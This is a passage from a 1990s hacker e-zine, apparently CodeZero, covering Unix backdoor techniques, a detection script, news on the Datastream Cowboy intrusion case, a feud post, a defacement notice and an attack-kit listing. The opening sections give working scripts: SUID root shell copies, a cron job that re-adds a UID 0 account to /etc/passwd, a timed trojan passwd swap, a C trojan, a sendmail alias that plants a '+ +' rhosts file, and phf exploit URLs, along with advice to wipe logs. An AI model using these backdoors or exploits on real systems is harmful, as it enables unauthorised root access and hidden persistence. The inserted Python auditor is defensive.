    echo Done...

*** NOTE : MODIFY THE ECHO "YOURUSER..." PART!!

Here is a script that kinda does the same thing, but instead of making a new
account, it will look for an old, disabled account and enable it just for you:

dead.sh
-------

    #!/bin/sh
    # Everyone's favorite...
    cp /bin/csh /tmp/.yourlittleshell     # Don't name it that...
    chmod 4755 /tmp/.yourlittleshell

Ok, here is where the cron comes in. It will look in the passwd file to check
if YourUser is still alive. If not, it brings him back!

revive.sh
---------

    #!/bin/csh
    # Is YourUser still on the system?
    # Let's make sure he is.
    # daemon9@netcom.com
    set evilflag = (`grep YourUser /etc/passwd`)
    if($#evilflag == 0) then              # Is he there?
        set linecount = `wc -l /etc/passwd`
        cd                                # Do this at home.
        cp /etc/passwd ./temppass         # Safety first.
        @ linecount[1] /= 2
        @ linecount[1] += 1               # we only want 2 temp files
        split -$linecount[1] ./temppass
        # passwd string optional
        echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa
        cat ./xab >> ./xaa
        mv ./xaa /etc/passwd
        chmod 644 /etc/passwd             # or whatever it was beforehand
        rm ./xa* ./temppass
        echo Done...
    else
    endif

Cron #2
-------

First of all, you will need a copy of the /etc/passwd file in a hidden
location. For this example, we will use /var/spool/mail/.hidepass. We have one
entry in it that will be our root account we will use. Then let's make a cron
that will save a copy of the real /etc/passwd file and install the hidden
passwd file as the real one for 1 minute at a time of your choice. Make it at a
slow time of day, because anyone who tries to access the passwd file during
this minute will get an error. 4:30 am is a good time. Put this in root's cron
to do this :

    29 4 * * * /bin/usr/hidenhidenpass

..make sure this exists:

    # echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidepass

Here is the /bin/usr/hidenhidenpass :

hidenhidenpass
--------------

    #!/bin/sh
    # Install trojan /etc/passwd file for one minute
    # daemon9@netcom.com
    cp /etc/passwd /etc/.temppass
    cp /var/spool/mail/.hidepass /etc/passwd
    sleep 60
    mv /etc/.temppass /etc/passwd

Cron #3
-------

This is a C program that will work like the above. Cron it as root like the
above and just let this file load every day.

hidden.c
--------

    #include <stdio.h>
    #include <stdlib.h>      /* system() */
    #include <string.h>      /* strcmp() */
    #include <unistd.h>      /* sleep() */

    #define KEYWORD "industry3"
    #define BUFFERSIZE 10

    int main(argc, argv)
    int argc;
    char *argv[];
    {
        int i=0;

        if(argv[1]){                 /* we've got an argument, is it the keyword? */
            if(!(strcmp(KEYWORD,argv[1]))){
                /* This is the trojan part. */
                system("cp /bin/csh /bin/.swp121");
                system("chown root /bin/.swp121");
                system("chmod 4755 /bin/.swp121");
            }
        }
        /* Put your possibly system specific trojan messages here */
        /* Let's look like we're doing something... */
        printf("Synchronizing bitmap image records.");
        /* system("ls -alR / >& /dev/null > /dev/null&"); */
        for(;i<10;i++){
            fprintf(stderr,".");
            sleep(1);
        }
        printf("\nDone.\n");
        return(0);
    } /* End main */

=============================================================================
section 5:
=============================================================================

Sendmail backdoor :
-------------------

With this, you have to edit the /etc/aliases file. Add this line:

    decode: |/usr/bin/uudecode

Make sure u hide it in there so it ain't obvious :). The uudecode file will be
a .rhosts file with the full pathname embedded. Here is the script:

uudecode.sh
-----------

    #!/bin/sh
    # Create our .rhosts file. Note this will output to stdout.
    echo "+ +" > tmpfile
    /usr/bin/uuencode tmpfile /root/.rhosts

Ok, now telnet to victimserver.com at port 25. Fakemail to decode and use as
the subject body the uuencoded version of the .rhosts file. Here is an easy
one (but not fake):

    echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com

You can add any program that I have listed to be run from the alias, so be as
creative as u want! :)

=============================================================================
section 6:
=============================================================================

Others :

Here is one of the best trojans I have seen. It is sneaky and only detectable
by programs like tripwire. All you have to do is put the trojan code into the
source of some popular system programs. su, login, and passwd are very good to
add it to because they run SUID root and don't have strict permissions so you
can modify them. This will tell you what to do after u get the source code for
the particular UNIX system you are backdooring.
If you can't get the source for any programs on your system, u may be screwed
:(. You can find trojaned versions of many programs. Here is a small example
of pseudo-code that is added in such programs...

    get input;
    if input is special hardcoded flag, spawn evil trojan;
    else if input is valid, continue;
    else quit with error;
    ...

=============================================================================
section 7:
=============================================================================

Keeping the backdoor :

Well, the best advice I can possibly give to start off is to cover your
tracks. If the admin doesn't know he's been hacked, he won't look for backdoors
to remove. This will totally depend on the admin's ability to find backdoors
and know how to get rid of them.

7. One Last Thing About The Infamous pHf Technique : so1o

You can use this basic form of attack... [Thru NutScrape For Example]

    http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
    [        1        ][    2     ][    3     ][  4   ][5][    6    ]

1: The Target Site.
2: The pHf Command.
3: The Magic pHf Arguments.
4: The Program You Wish To Run.
5: %20 Is A Space, so %20%20%20 == 3 Spaces.
6: The Arguments You Wish To Use.

Here Are Some Other Examples...
-------------------------------

    http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/etc/

...This will list the files in the /etc/ directory.

    http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a

...This will display the operating system.

Remember : You execute the commands with pHf as the user nobody, so you can't
shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the stuff you throw
at the system using phf will be logged too, so if you do decide to hack the
system, remember to kill the logs when you get root :)

===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
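The persistence spots sections 4 and 5 of the backdoor article rely on (inetd.conf and services entries, the root crontab, a program alias in /etc/aliases, a "+ +" rhosts line) are each a few lines to audit. What follows is an added example written for this page, not part of the article: the file contents are constructed to carry the article's own examples (suled on 142/tcp, the decode alias, the hidenhidenpass cron entry), and PROGRAM_DIRS is this example's assumption about where a root crontab normally runs programs from.

```python
import re

SHELLS = {"sh", "csh", "bash", "ksh", "tcsh", "zsh"}
# Directories a root crontab would normally run programs from (assumption).
PROGRAM_DIRS = {"/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib",
                "/usr/local/bin", "/usr/local/sbin", "/etc"}
CRON_LINE = re.compile(r"^(?:\S+\s+){5}(?P<cmd>\S.*)$")   # five time fields, then the command

# Constructed file contents carrying the article's own examples.
SERVICES = """\
ftp           21/tcp
telnet        23/tcp
netbios-ssn  139/tcp   nbssn
suled        142/tcp   suled
imap         143/tcp             # imap network mail protocol
snmp         161/udp
"""
INETD_CONF = """\
ftp        stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet     stream tcp nowait root /usr/sbin/tcpd in.telnetd
suled      stream tcp nowait root /bin/sh sh -i
ingreslock stream tcp nowait root /bin/sh sh -i
"""
ALIASES = """\
postmaster: root
decode: |/usr/bin/uudecode
"""
ROOT_CRONTAB = """\
0 0 * * 1 /usr/bin/updatedb
29 4 * * * /bin/usr/hidenhidenpass
"""
RHOSTS = "+ +\n"


def lines(text):
    """Yield non-empty lines with '#' comments stripped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            yield line

def parse_services(text):
    """name -> {'port/proto', ...}; alias names after the port are ignored."""
    services = {}
    for line in lines(text):
        fields = line.split()
        if len(fields) >= 2 and "/" in fields[1]:
            services.setdefault(fields[0], set()).add(fields[1])
    return services

def audit_inetd(text, services):
    """Entries that spawn a shell directly, or whose name /etc/services lacks."""
    findings = []
    for line in lines(text):
        f = line.split()
        if len(f) < 6:
            continue
        name, server, args = f[0], f[5], f[6:]
        if name not in services:
            findings.append(("inetd-unknown-service", name, line))
        if any(p.rsplit("/", 1)[-1] in SHELLS for p in [server] + args):
            findings.append(("inetd-spawns-shell", name, line))
    return findings

def audit_aliases(text):
    """Aliases that pipe mail into a program (LaRCSCAN's decode/uudecode check)."""
    findings = []
    for line in lines(text):
        alias, sep, target = line.partition(":")
        if sep and target.strip().startswith("|"):
            findings.append(("alias-pipes-to-program", alias.strip(), target.strip()))
    return findings

def audit_crontab(text):
    """Commands that are relative, hidden ('/.' component) or outside PROGRAM_DIRS."""
    findings = []
    for line in lines(text):
        m = CRON_LINE.match(line)
        if not m:
            continue
        prog = m.group("cmd").split()[0]
        if not prog.startswith("/"):
            findings.append(("cron-relative-command", prog, line))
        elif "/." in prog or prog.rsplit("/", 1)[0] not in PROGRAM_DIRS:
            findings.append(("cron-unusual-path", prog, line))
    return findings

def audit_rhosts(text, filename):
    """A '+' host field trusts every host (LaRCSCAN's +LINE check)."""
    return [("rhosts-wildcard", filename, line)
            for line in lines(text) if line.split()[0] == "+"]

def audit_all():
    """Run every check over the constructed samples; (check, subject, line) tuples."""
    services = parse_services(SERVICES)
    return (audit_inetd(INETD_CONF, services) + audit_aliases(ALIASES)
            + audit_crontab(ROOT_CRONTAB) + audit_rhosts(RHOSTS, "/root/.rhosts"))
```

Feeding the real files in (open("/etc/inetd.conf").read() and so on) in place of the constants turns this into the host check; the ftp and telnet entries, the postmaster alias and the updatedb cron line produce no finding.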
Some History : nobody

Electronic doom will soon be visited on U.S. computer networks by information warriors, hackers, pan-national groups of computer-wielding religious extremists, possible agents of Libya and Iran, international thugs and money-mad Internet-savvy thieves. John Deutch, director of Central Intelligence, testified to the truth of the matter, so it must be graven in stone.

In a long statement composed in the august tone of the Cold Warrior, Deutch said to the Senate Permanent Subcommittee on Investigations on June 25, "My greatest concern is that hackers, terrorist organizations, or other nations might use information warfare techniques" to disrupt the national infrastructure.

The lack of solid evidence for any of the claims made by the intelligence community has created an unusual stage on which two British hackers, Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous show to demonstrate the threat of information warfare to members of Congress. Because of a break-in at an Air Force facility in Rome, NY, in 1994, both hackers were made the stars of two General Accounting Office reports on network intrusions in the Department of Defense earlier this year. The comings and goings of Datastream Cowboy also constitute the meat of Gelber and Christy's minority staff report from the Subcommittee on Investigations.

Before delving into it in detail, it's interesting to read what a British newspaper published about Datastream Cowboy, a sixteen-year-old, about a year before he was made the poster boy for information warfare and international hacking conspiracies in front of Congress. In a brief article, blessedly so in contrast to the reams of propaganda published on the incident for Congress, the July 5 1995 edition of The Independent wrote, "[Datastream Cowboy] appeared before Bow Street magistrates yesterday charged with unlawfully gaining access to a series of American defense computers. Richard Pryce, who was 16 at the time of the alleged offences, is accused of accessing key US Air Force systems and a network owned by Lockheed, the missile and aircraft manufacturers."

Pryce, a resident of a northwest suburb of London, did not enter a plea on any of 12 charges levied against him under the British Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland Yard as a result of work by the U.S. Air Force Office of Special Investigations. The Times of London reported that when police came for Pryce, they found him at his PC on the third floor of his family's house. Knowing he was about to be arrested, he "curled up on the floor and cried."

In Gelber and Christy's staff report, the tracking of Pryce, and to a lesser extent a collaborator called Kuji -- real name Mathew Bevan -- is retold as an eight-page appendix entitled "The Case Study: Rome Laboratory, Griffiss Air Force Base, NY Intrusion."

Pryce's entry into Air Force computers was noticed on March 28, 1994, when personnel discovered a sniffer program he had installed on one of the Air Force systems in Rome. The Defense Information Systems Agency (DISA) was notified. DISA subsequently called the Air Force Office of Special Investigations (AFOSI) at the Air Force Information Warfare Center in San Antonio, Texas. AFOSI then sent a team to Rome to appraise the break-in, secure the system and trace those responsible. During the process, the AFOSI team discovered Datastream Cowboy had entered the Rome Air Force computers for the first time on March 25, according to the report. Passwords had been compromised, electronic mail read and deleted and unclassified "battlefield simulation" data copied off the facility. The Rome network was also used as a staging area for penetration of other systems on the Internet.

AFOSI investigators initially traced the break-in back one step to the New York City provider, Mindvox. According to the Congressional report, this put the NYC provider under suspicion because "newspaper articles" said Mindvox's computer security was furnished by two "former Legion of Doom members." "The Legion of Doom is a loose-knit computer hacker group which had several members convicted for intrusions into corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.

AFOSI then got permission to begin monitoring -- the equivalent of wiretapping -- all communications on the Air Force network. Limited observation of other Internet providers being used during the break-in was conducted from the Rome facilities. Monitoring told the investigators the handles of hackers involved in the Rome break-in were Datastream Cowboy and Kuji.

Since the monitoring was of limited value in determining the whereabouts of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence network of informants, i.e., stool pigeons, that 'surf the Internet.'" Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from Britain. The anonymous source said he had e-mail correspondence with Datastream Cowboy in which the hacker said he was a 16-year-old living in England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also apparently ran a bulletin board system and gave the telephone number to the AFOSI source.

The Air Force team contacted New Scotland Yard and the British law enforcement agency identified the residence, the home of Richard Pryce, which corresponded to Datastream Cowboy's system phone number. English authorities began observing Pryce's phone calls and noticed he was making fraudulent use of British Telecom. In addition, whenever intrusions at the Air Force network in Rome occurred, Pryce's number was seen to be making illegal calls out of Britain.

Pryce travelled everywhere on the Internet, going through South America, multiple countries in Europe and Mexico, occasionally entering the Rome network. From Air Force computers, he would enter systems at the Jet Propulsion Laboratory in Pasadena, California, and the Goddard Space Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins and passwords of the Air Force networks in Rome, he was then able to get into the home systems of Rome network users, defense contractors like Lockheed.

By mid-April of 1994 the Air Force was monitoring other systems being used by the British hackers. On the 14th of the month, Kuji logged on to the Goddard Space Center from a system in Latvia and copied data from it to the Baltic country. According to Gelber's report, the AFOSI investigators assumed the worst, that it was a sign that someone in an eastern European country was making a grab for sensitive information. They broke the connection but not before Kuji had copied files off the Goddard system. As it turned out, the Latvian computer was just another system the British hackers were using as a stepping stone; Pryce had also used it to cover his tracks when penetrating networks at Wright-Patterson Air Force Base in Ohio, via an intermediate system in Seattle, cyberspace.com.

The next day, Kuji was again observed trying to probe various systems at NATO in Brussels and The Hague as well as Wright-Patterson. On the 19th, Pryce successfully returned to NATO systems in The Hague through Mindvox. The point Gelber and Christy seem to be trying to make is that Kuji, a 21-year-old, was coaching Pryce during some of his attacks on various systems.

By this point, New Scotland Yard had a search warrant for Pryce with the plan being to swoop down on him the next time he accessed the Air Force network in Rome. In April, Pryce penetrated a system on the Korean peninsula and copied material off a facility called the Korean Atomic Research Institute to an Air Force computer in Rome. At the time, the investigators had no idea whether the system was in North or South Korea. The impression created is one of hysteria and confusion at Rome. There was fear that the system, if in North Korea, would trigger an international incident, with the hack interpreted as an "aggressive act of war." The system turned out to be in South Korea. During the Korean break-in, New Scotland Yard could have intervened and arrested Pryce. However, for unknown reasons, the agency did not.

Those with good memories may recall mainstream news reports concerning Pryce's hack, which was cast as an entry into sensitive North Korean networks. It's worth noting that while the story was portrayed as the work of an anonymous hacker, both the U.S. government and New Scotland Yard knew who the perpetrator was. Further, according to Gelber's report, English authorities already had a search warrant for Pryce's house.

Finally, on May 12 British authorities pounced. Pryce was arrested and his residence searched. He crumbled, according to the Times of London, and began to cry. Gelber and Christy write that Pryce promptly admitted to the Air Force break-ins as well as others. Pryce confessed he had copied a large program that used artificial intelligence to construct theoretical Air Orders of Battle from an Air Force computer to Mindvox and left it there because of its great size, 3-4 megabytes. Pryce paid for his Internet service with a fraudulent credit card number.

At the time, the investigators were unable to find out the name and whereabouts of Kuji. A lead to an Australian underground bulletin board system failed to pan out. On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew Bevan -- a computer technician, had been arrested and charged in connection with the 1994 Air Force break-ins in Rome.

Rocker Tom Petty sang that even the losers get lucky some time.
He wasn't thinking of British computer hackers, but no better words could be used to describe the two Englishmen and a two-year-old chain of events that led to fame as international computer terrorists in front of Congress at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged campaigns of terror and chaos against the U.S., the makers of Congressional reports resorted to telling the same story over and over, three times in the space of the hearings on the subject. One envisions U.S. Congressmen too stupid or apathetic to complain, "Hey, didn't we get that yesterday, and the day before?" Pryce and Bevan appeared in "Security in Cyberspace" and twice in General Accounting Office reports AIMD-96-84 and T-AIMD-96-92. Jim Christy, the co-author of "Security in Cyberspace" and the Air Force Office of Special Investigations' source for the Pryce case, supplied the same tale for Jack Brock, author of the GAO reports. Brock writes, ". . . Air Force officials told us that at least one of the hackers may have been working for a foreign country interested in obtaining military research data or areas in which the Air Force was conducting advanced research." It was, apparently, more wishful thinking.

This year's UK hacking conference: Access All Areas, July 5th. http://www.access.org.uk


2. [GUNNAR], MadSeason and sIn : so1o

Some dudes called MadSeason and [GUNNAR] have been proving sIn's true lameness and logging it all at the same time, phear elite logging skills...

##################################################################################
#                                                                                #
#                                    Darkfool                                    #
#                        (What a Fool/The PHF hacker)                            #
#                                  BY [GUNNAR]                                   #
#                                                                                #
##################################################################################

Ever read a hacking txt by this guy? Ever realize just how useless the information in his txts is? Nothing in his txt files isn't covered in a hundred text files written before that better explain hacking techniques.
Like a quote from my pal MadSeason goes: "The fact is these txt files about hacking and phreaking are written by people with minimal knowledge. Then you have some newbie who comes along wanting to be some hacker god and reads a few files and has even less of a clue than the writer had about the subject, then goes around spewing out bullshit and claiming they are a hacker and/or phreaker, just an endless circle of ignorance."

That quote is so true. All these hack txts released by these groups like S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool knows is the PHF bug found in older versions of NCSA and Apache httpd. This bug is very well known (and over-exploited, might I add). Doing a search for ac.jp or edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for hacking.

Darkfool claims many things that he doesn't know. For instance, take Pascal programming. He claims to know it, but when asked a single question on it by Scorpion (MadSeason), he cannot answer. Here is a little something:

[13:53] How many parameters do Cluster object constructors take in pascal, DF?
[13:53] i have no idea scorpion
[13:54] I thought you knew Pascal
[13:54] i am learning it at college

There is a big difference between knowing and learning. I guess Darkfool doesn't realize that. It's all a part of trying to sound and seem "elite", which Darkfool is far from being. Seems as though Darkfool and the rest of his S.I.N. pals are copying MadSeason and myself, and questioning people's abilities. It's funny though, when MadSeason and I got to #sin questioning them, we get kicked for making them look stupid. And when they ask us something, and it doesn't go quite as they planned it, look what they do...

[14:14] *** Now talking in #sin
[14:15] hey
[14:15] how do i kill all jobs running on a shell ?
<[GUNNAR]> Well hello there!
[14:15] hey
<[GUNNAR]> kill -9 PID
<[GUNNAR]> If you really wanna kill it.
<[GUNNAR]> Boo Hoo.
<[GUNNAR]> Damn, that one didn't go well for you did it?
<[GUNNAR]> BTW, use the ps command to get the PID.
<[GUNNAR]> la la la la...
[14:17] *** Sinning sets mode: +b *!*@*.wco.com
[14:17] *** You were kicked by Fa|lur3 (banned)

In short, Darkfool, S.I.N. and the rest like him are really just wannabes trying to sound big and bad. Nothing wrong with groups or people who actually hack. But, when you have a group like S.I.N. whose members claim more than they know, it is truly sad. I myself am no great hacker (I'm not a hacker. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not claim more than I actually know. This is obviously not how Darkfool thinks of things. He wants to be known as a s00per hacker, which he is not. I'm writing this so you (the readers) don't buy into this bullshit and be misled by people like Darkfool and the group he is in, S.I.N.! They are truly sad people. What a shame I have brought out the truth!

I think more is somewhere on http://www.ilf.net/teknopia/


3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o

The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

Welcome To The [D]epartment of [O]wned [E]nergy


You could define this as an act of aggression, or you could define it as us, the hackers (or crackers), just advising you to try and make it more difficult for us, at least employ consultants etc. who have a CLUE, because one day, in the not so distant future, the internet equivalent of Pearl Harbour will occur, and we will only be around to say "We told you so". Until that day, we will keep reminding you: get some security, it's better for you, it's better for us, it's better for everyone.

In this case, even though your system runs HP-UX, we advise you still take the time to look into all the exploits that are available for this operating system, and then get over to www.cert.org to find some advisories.

This attack was brought to you in association with 0range Amusements.

Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik, phractal chaos and all the usual suspects.


In the meantime, maybe you would like to visit...

The CrackHouse

Micro$oft

The CodeZero


We 0wN j00r EnErGy!@# wE 0wN j00R LiGhTbUlBz!@#~

===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================

-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/          The CodeZero           \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/        Remote Attack Kit.       \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/             [CRAK]              \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/          Version 1.666          \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/       .:. -=10/07/97=- .:.      \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\

New, improved, here it is...

===============================================================================
The Contents Of The Kit :
===============================================================================

dnsscan    : Mass DNS query program, gets lists of systems in entire countries,
             or all the systems on a network, like *.microsoft.com.
smscan     : Sendmail version scanner, very useful.
phpscan    : Scans hosts from a file and outputs a list of php vulnerable sites.
phpget     : Gets files from php vulnerable servers.
phfscan    : Scans hosts from a file and outputs a list of phf vulnerable sites.
ident-scan : Scans all daemons running on ports and determines cool stuff.
imap       : Exploits imap bug if port 143 is open.
tcpprobe   : Very simple portscanner.
fingah     : Uses an apache hole to finger systems if port 79 isn't open.
synk5      : The SYN flooder, basically kicks the shit out of systems.
octopus    : Octopus with UltiMods (ultima of CodeZero), crashes systems.
winuke     : This version allows you to select a port, I advise 139 or 113.
===============================================================================
Usages :
===============================================================================

Use this command to unpack crak.tar...

    % tar -xvf crak.tar

It extracts into a crak/ directory under whatever your current working directory is.

DNSscan :
---------

Usage: dnscan [-file ] [-domain ] [-sub ]

-file       Uses a list of subdomains and servers to scan.
-domain     Lists all servers in a first level domain like com or net.
-subdomain  Lists all servers in a domain.

The -domain mode will first create a file called 'domain.' with a list of all subdomains and their name servers, and then use that file in the -file mode. The input file needs to have the following format:

[]

To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"

SMscan     : smscan
PHPscan    : phpscan
PHPget     : phpget
PHFscan    : phfscan
Ident-Scan : ident-scan [low port] [high port]
TCPprobe   : tcpprobe
Fingah     : fingah
Synk5      : synk5
Octopus    : octopus [port] (default port is 25)
Winnuke    : winnuke [port] (default port is 139)

===============================================================================
Where To Get CRAK.tar : http://www.codez.com
===============================================================================

It can be unzipped with WinZip if you are in W1nd0ze too.. :)

===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================

--------------------------------------+---------------------------------------
|        YOUR SPECIAL AD               |
|     COULD BE RIGHT HERE #@!          |
|                                      |
|   SEND ELECTRONIC MAIL TO:           |
|        ADZ@CODEZ.COM                 |
--------------------------------------+---------------------------------------

Remember, McDonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*